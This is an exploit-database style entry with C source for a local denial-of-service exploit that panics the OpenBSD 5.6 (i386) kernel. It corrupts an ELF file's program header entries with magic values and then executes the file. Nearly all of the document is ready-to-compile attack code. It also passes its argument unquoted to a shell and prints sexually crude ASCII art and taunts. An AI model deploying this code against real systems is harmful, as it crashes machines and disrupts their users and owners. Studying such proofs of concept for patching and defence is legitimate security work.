"OpenBSD 5.6 - Multiple Local Kernel Panics (Denial of Service)"

Author

Exploit author

nitr0us

Platform

Exploit platform

bsd

Release date

Exploit published date

2015-04-21

/*

# Exploit Title: OpenBSD <= 5.6 - Multiple Local Kernel Panics
# Exploit Author: nitr0us
# Vendor Homepage: http://www.openbsd.org
# Version: 5.6
# Tested on: OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014), OpenBSD 5.6 i386, OpenBSD 5.5 i386

 * - 0xb16b00b5.c
 *
 * - Alejandro Hernandez (@nitr0usmx)
 * - Mexico 2015
 *
 * #########################################################################
 * #         OpenBSD <= 5.6 kernel panic()'s in sys/uvm/uvm_map.c          #
 * #########################################################################
 *
 * Tested under:
 * - OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014)
 * - OpenBSD 5.6 i386
 * - OpenBSD 5.5 i386
 *
 * https://www.youtube.com/watch?feature=player_detailpage&v=PReopSQZOrY#t=20
 *
 */

#include <sys/param.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/stat.h>

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#ifndef  __OpenBSD__
	#error "Not OpenBSD !!!1111";
#else
#include <sys/exec_elf.h>
#endif

#ifndef __i386__
	#error "Not i386 !!!1111";
#endif

/*
 * ASCII-art banner that main() prints with printf("%s", ...) right before
 * it starts rewriting the target's program header table.  Purely cosmetic;
 * nothing reads it back.
 */
char big_b00bz[] =
"       8M:::::::8888M:::::888:::::::88:::8888888::::::::Mm\n"
"      88MM:::::8888M:::::::88::::::::8:::::888888:::M:::::M\n"
"     8888M:::::888MM::::::::8:::::::::::M::::8888::::M::::M\n"
"    88888M:::::88:M::::::::::8:::::::::::M:::8888::::::M::M\n"
"   88 888MM:::888:M:::::::::::::::::::::::M:8888:::::::::M:\n"
"   8 88888M:::88::M:::::::::::::::::::::::MM:88::::::::::::M\n"
"     88888M:::88::M::::::::::*88*::::::::::M:88::::::::::::::M\n"
"    888888M:::88::M:::::::::88@@88:::::::::M::88::::::::::::::M\n"
"    888888MM::88::MM::::::::88@@88:::::::::M:::8::::::::::::::*8\n"
"    88888  M:::8::MM:::::::::*88*::::::::::M:::::::::::::::::88@@\n"
"    8888   MM::::::MM:::::::::::::::::::::MM:::::::::::::::::88@@\n"
"     888    M:::::::MM:::::::::::::::::::MM::M::::::::::::::::*8\n"
"     888    MM:::::::MMM::::::::::::::::MM:::MM:::::::::::::::M\n"
"      88     M::::::::MMMM:::::::::::MMMM:::::MM::::::::::::MM\n"
"       88    MM:::::::::MMMMMMMMMMMMMMM::::::::MMM::::::::MMM\n"
"        88    MM::::::::::::MMMMMMM::::::::::::::MMMMMMMMMM\n"
"         88   8MM::::::::::::::::::::::::::::::::::MMMMMM\n"
"          8   88MM::::::::::::::::::::::M:::M::::::::MM\n"
"              888MM::::::::::::::::::MM::::::MM::::::M";

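/*
 * Entry point.  Maps the ELF executable named by argv[1] read/write,
 * rewrites three program header entries exactly as the original PoC does
 * (pht[9].p_type, pht[2].p_filesz and, on two of three runs, pht[5].p_vaddr),
 * flushes the mapping and then runs the modified file.
 *
 * argv[1] must be a writable 32-bit ELF file.  Every failing system call
 * before the file is touched is now reported and ends the run with status 1;
 * the original 0xDEFECA7E status is kept for the fall-through case where the
 * target ran and returned normally.
 */
int main(int argc, char **argv)
{
	Elf32_Ehdr *hdr;
	Elf32_Phdr *pht;
	struct stat statinfo;
	char *elfptr;
	size_t maplen;
	unsigned long long needed;
	int fd;

	if (argc != 2) {
		fprintf(stderr, "Usage: %s <elf_exec>\n", argv[0]);
		return 1;
	}

	/* The file is modified through a shared mapping, so it must be writable. */
	fd = open(argv[1], O_RDWR);
	if (fd < 0) {
		perror(argv[1]);
		return 1;
	}
	if (fstat(fd, &statinfo) < 0) {
		perror("fstat");
		close(fd);
		return 1;
	}
	/* An empty or truncated file cannot hold the ELF header read below. */
	if (statinfo.st_size < (off_t)sizeof(Elf32_Ehdr)) {
		fprintf(stderr, "%s: too small to be an ELF file\n", argv[1]);
		close(fd);
		return 1;
	}
	maplen = (size_t)statinfo.st_size;

	elfptr = mmap(NULL, maplen, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
	if (elfptr == MAP_FAILED) {
		perror("mmap");
		close(fd);
		return 1;
	}
	hdr = (Elf32_Ehdr *) elfptr;

	/* Only a 32-bit ELF image has the header layout the writes below assume. */
	if (memcmp(hdr->e_ident, ELFMAG, SELFMAG) != 0 ||
	    hdr->e_ident[EI_CLASS] != ELFCLASS32) {
		fprintf(stderr, "%s: not a 32-bit ELF file\n", argv[1]);
		munmap(elfptr, maplen);
		close(fd);
		return 1;
	}
	/*
	 * The highest entry touched is pht[9]; make sure those bytes lie inside
	 * the mapping so a short file is rejected instead of faulting in this
	 * program.  The indices are taken from the original PoC and are not
	 * compared with e_phnum, because the original writes there regardless
	 * of the table length.  Widened arithmetic avoids a 32-bit wrap.
	 */
	needed = (unsigned long long)hdr->e_phoff + 10ULL * sizeof(Elf32_Phdr);
	if (needed > (unsigned long long)maplen) {
		fprintf(stderr, "%s: program header table out of range\n", argv[1]);
		munmap(elfptr, maplen);
		close(fd);
		return 1;
	}
	pht = (Elf32_Phdr *) (elfptr + hdr->e_phoff);

	printf("%s", big_b00bz);
	pht[9].p_type   = 0x7defaced; // <--- these overwrites ------------v
	pht[2].p_filesz = (arc4random() % 2) ? 0x41414141 : 0x43434343; // are necessary
	sleep(3 + (arc4random() % 3));
	if (arc4random() % 3 == 2) {
		puts(" .. I like b1g 0nez !!"); // 33.33% chance
	} else if (arc4random() % 2) {
		puts(" .. want s0me ?!"); // .6666 * .5 = 33.33% chance
		pht[5].p_vaddr = 0xb16b00b5;
	} else {
		puts(" .. j00 like it ?!"); // .6666 * .5 = 33.33% chance
		pht[5].p_vaddr = 0x0ace55e8;
	}
	/*
	 * The original passed a length of 0, which the BSD msync(2) treats as
	 * "the whole region containing addr"; the mapping covers the whole file,
	 * so passing its length is the same request spelled out explicitly.
	 */
	msync(elfptr, maplen, MS_ASYNC);
	munmap(elfptr, maplen);
	close(fd);
	sleep(3 + (arc4random() % 3));
	/*
	 * argv[1] is handed to /bin/sh as a command line, so a path containing
	 * spaces or shell metacharacters has to be quoted by the caller.
	 */
	system(argv[1]); // ( o )( o )   panic()
	puts("... s0rry, this piece of sh1t didn't w0rk in j00r obsd\n");
	return 0xDEFECA7E;
}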